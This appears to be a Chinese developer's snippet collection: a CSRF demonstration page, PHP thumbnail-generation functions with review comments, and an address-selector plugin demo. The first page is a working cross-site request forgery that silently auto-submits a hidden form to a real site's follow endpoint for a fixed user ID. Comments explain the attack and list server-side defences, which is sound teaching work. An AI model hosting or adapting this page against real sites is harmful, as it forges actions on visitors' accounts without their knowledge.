CSRF攻击范例

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>自动加粉丝</title>
</head>

<body>
<!-- Demonstration of cross-site request forgery: loading this page submits the form below with no user action. The wrapping div is hidden and the response is directed into the iframe, so the visitor sees nothing. -->
<!-- The request only takes effect if the receiving endpoint identifies the user purely from credentials the browser attaches automatically; whether the endpoint still behaves that way cannot be told from this page. -->
<!-- Server-side defences: require an unpredictable per-session token on every state-changing request and verify it, set the SameSite attribute on session cookies, and reject requests whose Origin or Referer header is not the site's own. -->
<div style="display:none">
<form action="http://t.ci123.com/subs/follow.php" name="addForm" method="post" id="addFans" target="ipost">
<input type="text" name="uid" value="1535917"  />
<input type="text" name="types" value="1" />
</form>
<iframe name="ipost" id="ipost"></iframe>
</div>
<script language="javascript">
// Submits the form as soon as the parser reaches this point; no click is involved.
document.getElementById("addFans").submit();
</script>
</body>
</html>

php压缩图片函数

/*
*编	写:袁	亮
*时	间:2013-02-27
*功	能:常见的两种缩略图生成策略实现,图片不允许变形,在生成缩略图之前需要确保图片存放目录存在并有写权限
	   可以调用createDirs创建目录并赋予相应的权限,该函数支持多级目录
	   在window下测试时处理大图片可能会出现内存不足,可以使用ini_set('memory_limit', '12M');更改内存限制
*/

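/**
 * Create a directory together with any missing parent directories.
 *
 * The previous recursive form never terminated for a path whose dirname()
 * chain does not reach an existing directory (the empty string, for example);
 * such input now returns false.
 *
 * @param string $dir   Directory path to create.
 * @param int    $model Permission bits handed to mkdir() for every level that is
 *                      created; the process umask is still applied on top.
 *                      NOTE(review): the 0777 default is kept for existing callers,
 *                      but a directory that receives uploaded or generated files
 *                      is better created with a narrower mode such as 0755.
 * @return bool True when $dir exists as a directory on return, false otherwise.
 */
function createDirs($dir,$model=0777){
	if((string)$dir===''){//nothing to create, and dirname('') is '' again
		return false;
	}
	if(is_dir($dir)){
		return true;
	}
	//Re-check with is_dir() so that a directory created by another process
	//between the test above and mkdir() still counts as success.
	return mkdir($dir,$model,true) || is_dir($dir);
}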
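/*
 * Produce a thumbnail of exactly $new_width x $new_height pixels: the source is
 * scaled without distortion until it covers the target box, then the overflow is
 * cropped equally from both sides. GIF, JPEG and PNG sources are accepted and the
 * scaled result is written as JPEG.
 *
 * @old_src:    path of the source image
 * @new_src:    path the thumbnail is written to
 * @new_width:  thumbnail width in pixels, must be at least 1
 * @new_height: thumbnail height in pixels, must be at least 1
 * @rate:       JPEG quality 0-100, optional, default 100
 * Returns 1 on success, -1 when the file is not a supported image type,
 * -2 when the image cannot be decoded, -3 when the thumbnail cannot be produced
 * (this includes a non-positive target size).
 */
function cutPhotoDesign($old_src,$new_src,$new_width,$new_height,$rate=100){
	$old_info = getimagesize($old_src);
	if($old_info===false){//unreadable, or not an image getimagesize() recognises
		return -1;
	}
	$type = $old_info[2];
	if($type!==1 && $type!==2 && $type!==3){//1=GIF, 2=JPEG, 3=PNG
		return -1;
	}

	//A zero or negative target would otherwise reach the divisions further down.
	$new_width = (int)$new_width;
	$new_height = (int)$new_height;
	if($new_width<1 || $new_height<1){
		return -3;
	}

	//NOTE(review): the source is decoded at its full pixel size here. When $old_src
	//can be an uploaded file, compare $old_info[0]*$old_info[1] with a limit that
	//fits memory_limit before this point, so an oversized image is refused early.
	switch($type){
		case 1:$im = imagecreatefromgif($old_src);break;
		case 2:$im = imagecreatefromjpeg($old_src);break;
		default:$im = imagecreatefrompng($old_src);break;
	}

	if(!$im){
		return -2;
	}
	$old_width = imagesx($im);
	$old_height = imagesy($im);

	if($old_width<=$new_width && $old_height<=$new_height){
		//Source already fits: the file is copied byte for byte. This branch does
		//not re-encode, so the output keeps the source format and every byte of
		//the original file; callers handling uploads must not treat it as cleaned.
		$res = copy($old_src,$new_src);
		imagedestroy($im);
		return $res?1:-3;
	}

	$x_rate = $old_width/$new_width;//scale factors per axis; the smaller one makes the image cover the box
	$y_rate = $old_height/$new_height;
	if($x_rate<$y_rate){//fit the width, crop the height
		$dst_x = $new_width;
		$dst_y = (int)ceil($old_height/$x_rate);
		$new_start_x = 0;
		$new_start_y = (int)(($dst_y-$new_height)/2);
	}else{//fit the height, crop the width
		$dst_x = (int)ceil($old_width/$y_rate);
		$dst_y = $new_height;
		$new_start_x = (int)(($dst_x-$new_width)/2);
		$new_start_y = 0;
	}

	$newim = imagecreatetruecolor($dst_x,$dst_y);//proportionally scaled copy
	if(!$newim){
		imagedestroy($im);
		return -3;
	}
	imagecopyresampled($newim,$im,0,0,0,0,$dst_x,$dst_y,$old_width,$old_height);

	$cutim = imagecreatetruecolor($new_width,$new_height);//final canvas, centred crop of the scaled copy
	if(!$cutim){
		imagedestroy($im);
		imagedestroy($newim);
		return -3;
	}
	imagecopyresampled($cutim,$newim,0,0,$new_start_x,$new_start_y,$new_width,$new_height,$new_width,$new_height);
	$res = imagejpeg($cutim,$new_src,$rate);

	imagedestroy($im);
	imagedestroy($newim);
	imagedestroy($cutim);
	return $res?1:-3;
}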
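/*
 * Produce a thumbnail that fits inside $new_width x $new_height: the source is
 * scaled without distortion and nothing is cropped, so one side may end up
 * shorter than requested. GIF, JPEG and PNG sources are accepted and the scaled
 * result is written as JPEG.
 *
 * @old_src:    path of the source image
 * @new_src:    path the thumbnail is written to
 * @new_width:  maximum thumbnail width in pixels, must be at least 1
 * @new_height: maximum thumbnail height in pixels, must be at least 1
 * @rate:       JPEG quality 0-100, optional, default 100
 * Returns 1 on success, -1 when the file is not a supported image type,
 * -2 when the image cannot be decoded, -3 when the thumbnail cannot be produced
 * (this includes a non-positive target size).
 */
function cutPhoto($old_src,$new_src,$new_width,$new_height,$rate=100){
	$old_info = getimagesize($old_src);
	if($old_info===false){//unreadable, or not an image getimagesize() recognises
		return -1;
	}
	$type = $old_info[2];
	if($type!==1 && $type!==2 && $type!==3){//1=GIF, 2=JPEG, 3=PNG
		return -1;
	}

	//A zero or negative target would otherwise reach the divisions further down.
	$new_width = (int)$new_width;
	$new_height = (int)$new_height;
	if($new_width<1 || $new_height<1){
		return -3;
	}

	//NOTE(review): the source is decoded at its full pixel size here. When $old_src
	//can be an uploaded file, compare $old_info[0]*$old_info[1] with a limit that
	//fits memory_limit before this point, so an oversized image is refused early.
	switch($type){
		case 1:$im = imagecreatefromgif($old_src);break;
		case 2:$im = imagecreatefromjpeg($old_src);break;
		default:$im = imagecreatefrompng($old_src);break;
	}

	if(!$im){
		return -2;
	}
	$old_width = imagesx($im);
	$old_height = imagesy($im);

	if($old_width<=$new_width && $old_height<=$new_height){
		//Source already fits: the file is copied byte for byte. This branch does
		//not re-encode, so the output keeps the source format and every byte of
		//the original file; callers handling uploads must not treat it as cleaned.
		$res = copy($old_src,$new_src);
		imagedestroy($im);
		return $res?1:-3;
	}

	$x_rate = $old_width/$new_width;//scale factors per axis; the larger one makes the image fit the box
	$y_rate = $old_height/$new_height;
	if($x_rate<$y_rate){//height is the limiting side
		$dst_x = (int)ceil($old_width/$y_rate);
		$dst_y = $new_height;
	}else{//width is the limiting side
		$dst_x = $new_width;
		$dst_y = (int)ceil($old_height/$x_rate);
	}

	$newim = imagecreatetruecolor($dst_x,$dst_y);//canvas at the computed size
	if(!$newim){
		imagedestroy($im);
		return -3;
	}
	//The white colour used to be allocated but never painted, which left the
	//canvas black behind transparent pixels. Fill first, then draw on top.
	$bg = imagecolorallocate($newim,255,255,255);
	imagefill($newim,0,0,$bg);
	imagecopyresampled($newim,$im,0,0,0,0,$dst_x,$dst_y,$old_width,$old_height);
	$res = imagejpeg($newim,$new_src,$rate);

	imagedestroy($im);
	imagedestroy($newim);
	return $res?1:-3;
}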

邮寄地址插件demo范例

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>邮寄地址插件使用范例</title>
</head>

<body>
<!-- Three linked drop-downs: choosing a province reloads the city list, choosing a city reloads the district list. -->
<form name="recvaddress_form">
<select name="province" onchange="ciarea.selcity(this.value,0);" style="width:80px;"></select> 省
<select name="city" style="width:120px;" onchange="ciarea.selarea(this.value,0);"></select> 市
<select name="area" style="width:120px;"></select> 区
</form>
<!-- NOTE(review): common.js is fetched over plain http from another host and runs with this page's full privileges, so anyone able to alter that response controls the page. Prefer an https URL, and either pin the file with an integrity attribute or serve a reviewed copy from the same origin. -->
<script type="text/javascript" src="http://shiyong.ci123.com/district/common.js"></script>
<script type="text/javascript">
// ciarea and the ci_province / ci_city / ci_area globals are presumably defined by common.js; confirm against that file.
window.onload = function(){
//ci_province=11;ci_city=1100;ci_area=41306; // set these when editing a saved address so that its province, city and district are preselected
ciarea.selprovince(ci_province,ci_city,ci_area);
}
</script>
</body>
</html>